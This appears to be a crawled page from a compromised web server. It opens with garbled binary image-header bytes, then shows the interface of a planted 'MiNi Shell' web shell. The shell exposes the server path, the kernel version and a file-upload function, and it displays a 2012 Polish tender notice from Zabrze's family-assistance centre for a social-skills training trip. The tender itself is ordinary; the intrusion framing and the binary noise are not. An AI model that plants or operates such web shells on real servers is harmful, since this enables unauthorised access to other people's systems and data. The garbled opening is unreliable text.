JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121016/400020-N-2012.html

<p class="kh_header"><b>Zabrze: organizacja i przeprowadzenie wyjazdowego poradnictwa i wsparcia indywidualnego i grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych dla uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt.Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze</b><br>
<b>Numer ogłoszenia: 400020 - 2012; data zamieszczenia: 16.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Roosevelta 40, 41-800 Zabrze, woj. śląskie, tel. 032 2777800, faks 032 2777802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.zabrze.pl.pl,www.zabrze.magistrat.pl/zakładka opieka społeczna/mopr/zamówienia publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> organizacja i przeprowadzenie wyjazdowego poradnictwa i wsparcia indywidualnego i grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych dla uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt.Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> organizacja i przeprowadzenie wyjazdowego poradnictwa i wsparcia indywidualnego i grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych dla uczestników/uczestniczek projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt.Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze
UCZESTNICY:
W szkoleniu weźmie udział od 30 do 45 uczestników/uczestniczek projektu systemowego  oraz koordynator ze strony MOPR. Ponadto w wyjeździe będą brały udział dzieci uczestników/uczestniczek szkolenia w łącznej liczbie minimum 30 maksimum 45. Zamawiający przewiduje 1 grupę wyjazdową. 
DZIECI:
Na czas trwania szkolenia zostanie również zapewniona opieka nad dziećmi uczestników/uczestniczek  podczas wyjazdu w łącznej liczbie minimum 30 maksimum 45. Dzieci uczestników/uczestniczek szkolenia będą miały zapewnione zakwaterowanie z rodzicem/opiekunem oraz wyżywienie(po ? porcji)
Zamawiający przewiduje udział dzieci w n/w grupach :
Grupa najmłodsza tj. dzieci w wieku ( 0-3)
Grupa przedszkolna tj. dzieci w wieku (4- 6 lat)
Grupa wczesnoszkolna tj. dzieci w wieku ( 7 - 11)
Grupa szkolna tj. dzieci w wieku (12 - 17)
W sytuacji gdy liczba uczestniczących w wyjeździe dzieci w poszczególnych grupach nie przekroczy 3 dzieci istnieje możliwość połączenia grup za zgodą Zamawiającego.
Opieka  będzie zapewniona  w sposób dostosowany do ich wieku i sprawowana przez doświadczoną kadrę. Opieka winna być sprawowana w miarę jednolitych grupach wiekowych. Dzieci powinny mieć zapewnione dodatkowe atrakcje przy uwzględnieniu warunków atmosferycznych (zabawy ruchowe na powietrzu, spacer, zajęcia plastyczne, ruchowe na terenie ośrodka). 
CEL:
Nabycie i zwiększenie przez uczestnika/uczestniczkę  projektu pozytywnej autoprezentacji i uświadomienie ważności dbania o higienę i własny wizerunek w życiu codziennym. Zwiększenie możliwości w obszarze poszukiwania pracy.
PROGRAM:
Program szkolenia powinien zawierać m.in. zagadnienia dotyczące:
- zbudowanie gradacji własnych możliwości zawodowych;
- ustalenie możliwości zaistnienia na rynku pracy;
-nauka skutecznej autoprezentacji(komunikacja werbalna i niewerbalna)
- nauka kształtowania własnego wizerunku
- przygotowanie na krytykę, zachowanie w sytuacji niepowodzenia bądź stresu
Szczegółowy program szkolenia powinien zawierać wyżej przedstawione zagadnienia i być przedstawiony Zamawiającemu do akceptacji przed jego realizacją. Powinny się tam znaleźć: miejsce realizacji (dokładny adres), nazwę szkolenia, czas trwania i sposób organizacji zajęć, cel szkolenia, plan szkolenia zawierający nazwę zajęć oraz ich wymiar zgodny z zamówieniem.
- Szkolenie  musi zakończyć się wydaniem uczestnikom/uczestniczkom zaświadczenia o ukończeniu  poradnictwa i wsparcia indywidualnego i grupowego wraz z informacją o współfinansowaniu projektu przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze.
FORMA :
 Szkolenie składać się będzie z jednego wyjazdu od piątku do niedzieli. Jeden wyjazd weekendowy obejmować będzie 12 godzin szkoleniowych - treningowych zgodnych z zatwierdzonym harmonogramem. Przez 1 godzinę szkoleniową  Zamawiający rozumie 45 minut. Uczestnicy/uczestniczki szkolenia zostaną podzieleni maksymalnie na 15-osobowe grupy treningowe.
KADRA ZAPEWNIANA PRZEZ WYKONAWCĘ:
a)  Kierownik - opiekun wyjazdu. Zadaniem kierownika/opiekuna będzie m.in. organizacja czasu wolnego i wypoczynku, zapewnienie bezpieczeństwa uczestników, prowadzenie rozmów, ewentualne załatwianie problemów z Ośrodkiem typu organizacyjnego. Kierownik musi koordynować wyjazd  z Zabrza do miejsca pobytu i z powrotem poprzez rozmieszczenie osób w autokarze, opiekę podczas jazdy i postojów.
b)  Trener/Psycholog lub psychoterapeuta - do prowadzenia zajęć w zakresie treningu kompetencji i umiejętności społecznych  w liczbie umożliwiającej przeprowadzenie zajęć w grupach maksymalnie 15-osobowych - minimum 2 osoby - max. 3 osoby
c)opiekun/opiekunka w liczbie umożliwiającej zapewnienie opieki zgodnie z wymaganiami Zamawiającego
Średnio - 1 osoba na 5 dzieci tj. minimum 6 opiekunów /ek  max. 9 opiekunów/ek
MIEJSCE:
Wyjazdy odbędą się np. w Ustroniu, Korbielowie, Szczyrku lub innej miejscowości górskiej atrakcyjnej pod względem turystycznym - maksymalnie w odległości 150km od siedziby Zamawiającego (na warunkach określonych z Zamawiającym) zgodnie z uzgodnionym minimum 7 dni przed wyjazdem  harmonogramem. 
TERMIN:
Piątek, sobota, niedziela w okresie od 23 listopada do 16 grudnia 2012 r.
Szkolenia te muszą zakończyć się wydaniem uczestnikom/uczestniczkom  zaświadczenia o ukończeniu szkolenia wraz z informacją o ukończeniu wyjazdowego poradnictwa i wsparcia w zakresie podniesienia kompetencji i umiejętności społeczno-zawodowych dla uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze Jeżeli nie będzie możliwości zamieszczenia odpowiedniej informacji na zaświadczeniu - wydanie dodatkowego zaświadczenia zawierającego tę informację.
Zaliczenie szkolenia przez  pojedynczego uczestnika/uczestniczkę  projektu oznacza otrzymanie zaświadczenia o zakończeniu szkolenia .
Zajęcia powinny odbywać się: w pomieszczeniach dostosowanych do prowadzenia zajęć i odpowiednio w tym celu wyposażonych tj. w pomieszczeniach posiadających odpowiednie warunki sanitarne, akustyczne i spełniające warunki bezpieczeństwa.
Wykonawca zobowiązany jest do zapewnienia podczas zajęć wyposażenia dydaktycznego, odpowiadającego obowiązującemu stanowi prawnemu i poziomowi techniki oraz do udostępnienia uczestnikom/uczestniczkom. wszelkich materiałów szkoleniowych niezbędnych do przeprowadzenia szkolenia.
OPIS DODATKOWY :
A. Wykonawca zobowiązany jest do zapewnienia podczas wyjazdu:
-  fachowej kadry ,w tym kierownika, trenera, psychologa lub psychoterapeuty oraz opiekunek/ów do dzieci;
- zorganizowania i realizacji zajęć grupowych i integracyjnych  dla uczestników szkolenia - przynajmniej 1 wieczór integracyjny z muzyką na żywo(kapela), ogniskiem/grillem, zabawami i konkursami( koszt nagród pokryje Wykonawca do kwoty 50 zł na osobę);
- zapewnienia materiałów szkoleniowych, dydaktycznych i papierniczych wykorzystywanych podczas zajęć 
i oddanych uczestnikom/uczestniczkom na własność;
- zorganizowania i realizacji sesji  grupowych w trakcie programu;
- zapewnienia kosztów dojazdu i powrotu ze szkolenia, w tym również zapewnienie kosztów dojazdu oraz powrotu na wcześniej umówione miejsce spotkania, z którego nastąpi wyjazd (wyjazd nastąpi w piątek 
w godzinach popołudniowych; przyjazd powinien nastąpić w niedzielę w godzinach wieczornych) luksusowym autokarem  ;
- zapewnienia 3 dniowego pobytu w ośrodku wypoczynkowym od piątku do niedzieli , w tym zapewnienie dwóch noclegów  ;
- zaoferowany ośrodek nie może być pensjonatem, kwaterą prywatną, schroniskiem, zespołem domków turystycznych i winien być komfortowy tj. posiadać pokoje z łazienkami ( maksymalnie dla 3 osób), sale szkoleniowe, jadalnie, miejsce do wspólnego spędzania czasu służące integracji uczestników oraz miejsce do zabawy dzieci, miejsce z TV.
- uczestnicy/uczestniczki powinni zostać zakwaterowani ze względu na płeć a w przypadku nieparzystej liczby osób zapewniony zostanie pokój jednoosobowy. Rodziny wielodzietnie powinny zostać zakwaterowane razem lub, jeżeli nie ma takiej możliwości, w pokojach obok siebie. W pokojach powinna być zagwarantowana woda w ilości 1 l na osobę.
-  zapewnienie pełnego wyżywienia (3 posiłki dziennie) - śniadanie-obiad-kolacja dla uczestników/uczestniczki, dzieci 
( po ? porcji)  oraz opiekuna oraz w dniach wyjazdu/przyjazdu suchego prowiantu dla dorosłych i dzieci. Zapewnienie kawy i herbaty oraz drobnego poczęstunku w trakcie trwania zajęć oraz drobnego poczęstunku oraz napojów dla dzieci;
- zapewnienie opieki nad dziećmi uczestników/uczestniczek projektu w trakcie trwania zajęć;
- zorganizowania spotkań integrujących uczestników/uczestniczek  szkolenia;
- bezpłatnego pobytu koordynatora grupy;
- zapewnienia opiekuna ze strony organizatora wyjazdu od momentu transportu z miejsca wyjazdu do zakończenia szkolenia, przez cały czas trwania wyjazdu również w miejscu pobytu przez 24h.
 - zajęcia szkoleniowe, zakwaterowanie, wyżywienie oraz sprawowanie opieki nad dziećmi powinno być zapewnione w ramach jednego obiektu.
Cena szkolenia musi zawierać wszystkie opłaty związane z dojazdem i powrotem uczestników/ uczestniczek ze szkolenia również koszty ubezpieczenia od następstw nieszczęśliwych wypadków minimum na kwotę 10000,00 na 1 uczestnika/uczestniczkę  oraz na  taką samą na dziecko. 
ZAPŁATA:
Zamawiający zapłaci za zgłoszonych pisemnie uczestników/uczestniczki wyjazdu , którzy ukończyli pełen trening wyjazdowy. 
Zamawiający ze względu na specyfikę przedmiotu zamówienia nie jest w stanie dokładnie sprecyzować ilości uczestników/uczestniczek szkolenia i ich dzieci mogących wziąć udział w wyjeździe. Zamawiający winien dokonać kalkulacji zgodnie z podanymi ramami ilościowymi uczestników/uczestniczek dzieci( dotyczy to także liczby potrzebnych trenerów i opiekunów).
Opłata klimatyczna - Wykonawca uwzględni w cenie oferty opłatę klimatyczną dla wszystkich biorących udział w wyjeździe jeśli jej naliczanie związane jest z miejscem pobytu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.70.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenie oraz wykazu usług</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia i wykazu osób posiadających odpowiednie kwalifikacje zawodowe</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia oraz zaświadczenia z Urzędu Skarbowego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">referencje</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-formularz ofert
-pełnomocnictwo
-oświadczenie o posiadaniu wpisu do Rejestru Instytucji Szkoleniowych
-parafowany wzór umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje  możliwość zmian postanowień w zawartej umowie wprowadzonych aneksem takich jak:
- zmiana osób funkcyjnych - z przyczyn niezależnych od Zamawiającego i Wykonawcy
- zmiana sposobu reprezentacji - z przyczyn niezależnych od Zamawiającego i Wykonawcy
- zmiana adresu siedziby jednej ze stron - z przyczyn zewnętrznych
- wprowadzenie lub zmiana podwykonawcy - w uzasadnionych przypadkach, za pisemną zgodą Zamawiającego
- zmiana miejsca odbycia wyjazdu z przyczyn obiektywnych zaakceptowanych przez Zamawiającego na miejsce i standard ośrodka porównywalny z tym zaproponowanym w ofercie lub lepszy
- wprowadzenie informacji dodatkowych związanych z nowymi wytycznymi w realizacji Projektu
- zmiana wymiaru realizacji ilości godzin
- zmiana osób -kadry zapewnionej przez Wykonawcę na osoby o doświadczeniu nie mniejszym niż wymagane w SIWZ
- w przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę różnicy w kwocie podatku VAT,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.zabrze.pl,www.zabrze.magistrat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Zabrzu
ul. Roosevelta 40
41-800 Zabrze
pokój nr 216 - 2 piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2012 godzina 08:00, miejsce: Miejski Ośrodek Pomocy Rodzinie w Zabrzu
ul. Roosevelta 40
41-800 Zabrze
pokój nr 117 - 1 piętro - Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt.Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com